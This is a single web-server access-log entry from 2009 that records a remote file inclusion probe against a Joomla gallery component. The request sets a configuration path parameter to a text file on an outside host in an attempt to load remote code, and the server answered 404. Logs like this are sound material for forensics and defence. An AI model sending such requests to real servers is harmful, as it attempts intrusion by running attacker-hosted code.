95.110.198.81 - - [16/Dec/2009:08:55:44 -0600] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
